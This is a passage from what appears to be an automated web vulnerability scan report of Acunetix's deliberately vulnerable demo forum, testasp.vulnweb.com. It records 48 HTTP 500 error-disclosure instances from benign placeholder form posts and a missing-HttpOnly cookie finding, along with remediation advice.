Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 505 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| Instances | 48 |
| Solution |
Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user.
|
| Reference | |
| Tags |
WSTG-v42-ERRH-02
WSTG-v42-ERRH-01 OWASP_2021_A05 OWASP_2017_A06 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 90022 |
|
Low |
Cookie No HttpOnly Flag |
|---|---|
| Description |
A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | ASPSESSIONIDCQRDQBRC |
| Attack | |
| Evidence | Set-Cookie: ASPSESSIONIDCQRDQBRC |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | ASPSESSIONIDCQRDQBRC |
| Attack | |
| Evidence | Set-Cookie: ASPSESSIONIDCQRDQBRC |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a 